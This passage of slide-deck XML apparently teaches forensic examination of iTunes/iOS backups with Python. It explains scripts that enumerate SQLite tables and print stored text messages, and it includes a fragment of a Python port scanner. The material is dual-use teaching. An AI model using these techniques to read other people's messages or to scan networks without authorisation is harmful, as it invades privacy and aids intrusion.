              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Security researcher, Mr. Warden, found out that the data still remained in the database.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p73"/>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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="2336873"/>
            <a:ext cx="11206879" cy="35994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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Additionally, it is possible to extract information of all the text message out of an iOS backup using python. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This can be achieved by connecting to the backup and running SQL queries to extract the information.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p74"/>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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p75"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432767" y="1991475"/>
            <a:ext cx="6782747" cy="4572638"/>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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p76"/>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
        <p:nvSpPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685218" y="5398613"/>
            <a:ext cx="10445304" cy="51196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5" name="Google Shape;1195;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134682" y="2364683"/>
            <a:ext cx="11546376" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This code is a Python script that lists the tables in a SQLite database file. The sqlite3 library is imported, along with the os module. A function printTables is defined that takes a database file name as input.</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800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the function, a connection to the database is established using sqlite3.connect and a cursor is created using the cursor method of the connection object. A query is executed using the execute method of the cursor to retrieve the names of all tables in the database, filtered by their type being "table". The names of the tables are then printed along with the name of the database. If an error occurs during the process, it is silently ignored using a try-except block. Finally, the database connection is closed using conn.close().</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800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>At the end of the script, the current working directory is obtained using os.getcwd and its contents are listed using os.listdir. The function printTables is then called for each file in the directory to list the tables in the database files.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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1201" name="Google Shape;1201;p77"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1202" name="Google Shape;1202;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="443292" y="2127084"/>
            <a:ext cx="7412681" cy="4150594"/>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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p78"/>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
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74604" y="2281203"/>
            <a:ext cx="11687815" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This code is a Python function that checks if a "message" table exists in a SQLite database file. The function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isMessageTable takes a database file name as input and returns a boolean indicating whether a "message"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table is present in the database or not.</a:t>
            </a:r>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the function, a connection to the database is established using sqlite3.connect and a cursor is created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using the cursor method of the connection object. A query is executed using the execute method of the cursor to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retrieve the names of all tables in the database, filtered by their type being "table".</a:t>
            </a:r>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>For each row in the result of the query, the string representation of the row is checked to see if the word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"message" is present in it. If it is, the function returns True. If no "message" table is found or an error occurs </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during the process, the function returns False.</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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p79"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="388449" y="2503819"/>
            <a:ext cx="10755226" cy="3600953"/>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8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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p80"/>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
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490194" y="2479249"/>
            <a:ext cx="10112481" cy="34163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lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This code is a Python function that prints the date, address, and text of messages in a SQLite database file. The function printMessage takes a database file name as input.</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lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the function, a connection to the database is established using sqlite3.connect and a cursor is created using the cursor method of the connection object. A query is executed using the execute method of the cursor to retrieve the date, address, and text of all messages in the database where the address is greater than 0.</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lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>For each row in the result of the query, the date, address, and text of the message are extracted and stored in separate variables. The date is converted to a string representation. Finally, the date, address, and text of the message are printed. If an error occurs during the process, it is silently ignored using a try-except block.</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8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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p81"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="264591" y="2125272"/>
            <a:ext cx="7738766" cy="44956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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="10369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PORT SCANNER</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219600" y="1991350"/>
            <a:ext cx="11453100" cy="491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argparse</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threading</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port_scan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tgt_ports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try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tgt_ip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gethostbyname</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herror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endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>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try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gethostbyaddr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tgt_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)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 Scan Results for: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tgt_name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0</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herror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 Scan Results for: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tgt_ip</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chemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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8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rial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500"/>
              <a:t>Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p82"/>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
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="84841" y="2177592"/>
            <a:ext cx="11623250" cy="313932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lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This code is a Python function that checks if a "message" table exists in a SQLite database file. The function isMessageTable takes a database file name as input and returns a boolean indicating whether a "message" table is present in the database or not.</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lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the function, a connection to the database is established using sqlite3.connect and a cursor is created using the cursor method of the connection object. A query is executed using the execute method of the cursor to retrieve the names of all tables in the database, filtered by their type being "table".</a:t>
            </a:r>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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>For each row in the result of the query, the string representation of the row is checked to see if the word "message" is present in it. If it is, the function returns True. If no "message" table is found or an error occurs during the process, the function returns False.</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83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="921727"/>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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3540"/>
              <a:t>Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p83"/>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334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When a user perform backup in iOS devices it gets stored in  a special directory . </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>For windows it is in stores the mobile device backup directory under the user’s profile directory at C:\Documnets and Settings\&lt;username&gt;\ApplicationData \AppleComputer |MobileSync\Backup .</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> On MAC OS X this is at /Users/&lt;Username&gt;/Library/Application Support/MobileSync/Backup/.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="342900" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p83"/>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84"/>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322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We can examine using command (🡪ls)the  backup files which is named as a unique sequence of 40 characters that can provide a absolute no description of the content in a dedicated file.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We can also use file Unix command (🡪file *) to examine file type and type of file along with space allocation of  file header and a footer yet can give that much description of a file.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>So we can use python script to  enumerate all tables in a database found in the directory. This script is used to enlist all the working directory and then attempts establish a database connection. If successful then  script will run sql query (🡪SELECT tbl_name FROM sqlite_master WHERE type==‘table’).</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Sqlite database maintains a table named sqlite-master that consists of overall database structure and overall schema of the database . </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-135064" lvl="0" marL="571500" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3273"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250;p8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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1251" name="Google Shape;1251;p84"/>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85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="910575"/>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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3540"/>
              <a:t>Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1257" name="Google Shape;1257;p85"/>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322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Thus while enumeration we get message table  that have list of text message stored in the backup.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Writing  a script function that will return true only if the file contains the table named message.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We now have the ability to scan directory of thousand file and determine specific file contains message table in Sqlite database and can also display all the related data.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
